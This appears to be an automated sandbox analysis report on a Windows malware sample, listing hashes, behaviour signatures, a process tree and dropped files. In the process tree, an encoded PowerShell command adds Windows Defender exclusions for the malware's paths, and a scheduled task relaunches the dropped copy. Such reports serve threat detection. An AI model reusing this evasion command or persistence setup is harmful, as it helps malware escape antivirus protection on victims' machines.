Analysis

  • max time kernel
    126s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-12-2024 10:27

General

  • Target

    Opdxdyeul.exe

  • Size

    894KB

  • MD5

    cee58644e824d57927fe73be837b1418

  • SHA1

    698d1a11ab58852be004fd4668a6f25371621976

  • SHA256

    4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e

  • SHA512

    ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5

  • SSDEEP

    12288:etFDEnlFaqLcsjwwdbriOXrWh+7SmCHK4A04KJeYtS1dFXuehyFJ97wQjGuNafNJ:6q9ctmHiCpd4FJe0oeehyjPiuNv/L

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe
    "C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5372
    • C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe
      "C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"
      2⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:5504
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {B47258B2-097E-406C-ABBD-BCF5E8FCC090} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5716
    • C:\ProgramData\kgfxd\tshg.exe
      C:\ProgramData\kgfxd\tshg.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5748
      • C:\ProgramData\kgfxd\tshg.exe
        "C:\ProgramData\kgfxd\tshg.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5576
    • C:\ProgramData\kgfxd\tshg.exe
      C:\ProgramData\kgfxd\tshg.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5996
      • C:\ProgramData\kgfxd\tshg.exe
        "C:\ProgramData\kgfxd\tshg.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\kgfxd\tshg.exe

    Filesize

    894KB

    MD5

    cee58644e824d57927fe73be837b1418

    SHA1

    698d1a11ab58852be004fd4668a6f25371621976

    SHA256

    4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e

    SHA512

    ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5

  • C:\Windows\Tasks\Test Task17.job

    Filesize

    214B

    MD5

    9159275d7e4199d8848469e17896abc6

    SHA1

    049c020c21cabfc78c19fa5a64e3c4da80b7c536

    SHA256

    3d3948365b28c4084f5a15a8377b1a8eb7743e40379dd87d306d900ab56adaa9

    SHA512

    5c7146ca6ba696fab22d22305578a554c424617ab27f89b060848dfa17ae7e74c1fd512ab0fd68717088fbd0707ac96953faf5dc3f2a2417f0cb54f016602226

  • memory/2692-0-0x00000000748EE000-0x00000000748EF000-memory.dmp

    Filesize

    4KB

  • memory/2692-1-0x0000000000890000-0x0000000000976000-memory.dmp

    Filesize

    920KB

  • memory/2692-2-0x0000000004710000-0x00000000047EA000-memory.dmp

    Filesize

    872KB

  • memory/2692-3-0x00000000748E0000-0x0000000074FCE000-memory.dmp

    Filesize

    6.9MB

  • memory/2692-4-0x0000000005160000-0x000000000523C000-memory.dmp

    Filesize

    880KB

  • memory/2692-5-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-14-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-22-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-32-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-46-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-58-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-66-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-68-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-64-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-62-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-60-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-56-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-54-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-52-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-50-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-48-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-44-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-42-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-40-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-38-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-36-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-34-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-30-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-28-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-26-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-24-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-20-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-18-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-16-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-12-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-10-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-8-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-6-0x0000000005160000-0x0000000005236000-memory.dmp

    Filesize

    856KB

  • memory/2692-1077-0x00000000748E0000-0x0000000074FCE000-memory.dmp

    Filesize

    6.9MB

  • memory/2692-1078-0x0000000002120000-0x0000000002178000-memory.dmp

    Filesize

    352KB

  • memory/2692-1079-0x0000000000840000-0x000000000088C000-memory.dmp

    Filesize

    304KB

  • memory/2692-1080-0x00000000748EE000-0x00000000748EF000-memory.dmp

    Filesize

    4KB

  • memory/2692-1081-0x00000000748E0000-0x0000000074FCE000-memory.dmp

    Filesize

    6.9MB

  • memory/2692-1082-0x00000000748E0000-0x0000000074FCE000-memory.dmp

    Filesize

    6.9MB

  • memory/2692-1086-0x0000000004860000-0x00000000048B4000-memory.dmp

    Filesize

    336KB

  • memory/2692-1101-0x00000000748E0000-0x0000000074FCE000-memory.dmp

    Filesize

    6.9MB

  • memory/5372-1085-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

    Filesize

    256KB

  • memory/5748-1105-0x0000000000D00000-0x0000000000DE6000-memory.dmp

    Filesize

    920KB

  • memory/5996-2195-0x0000000000D00000-0x0000000000DE6000-memory.dmp

    Filesize

    920KB